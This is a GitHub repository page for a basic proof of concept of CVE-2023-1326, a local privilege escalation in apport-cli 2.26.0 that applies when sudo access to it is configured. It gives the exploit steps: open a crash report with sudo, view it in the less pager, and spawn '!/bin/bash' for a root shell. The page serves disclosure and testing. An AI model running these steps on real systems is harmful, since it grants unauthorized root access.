Pol-Ruiz / CVE-2023-1326

Esto es una prueba de concepto propia i basica de la vulneravilidad CVE-2023-1326

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

CVE-2023-1326

A proof of concept for CVE-2023–1326 in apport-cli 2.26.0

This vulnerability is privilege escalation in apport-cli 2.26.0, similar to CVE-2023–26604, this vulnerability only works if assign in sudoers:

image

A privilege escalation attack was found in apport-cli 2.26.0 and earlier which is similar to CVE-2023-26604. If a system is specially configured to allow unprivileged users to run sudo apport-cli, less is configured as the pager, and the terminal size can be set: a local attacker can escalate privilege.

PoC

sudo /usr/bin/apport-cli -c /var/crash/some_crash_file.crash
press V (view report)
!/bin/bash

image image

About

Esto es una prueba de concepto propia i basica de la vulneravilidad CVE-2023-1326

License:GNU General Public License v3.0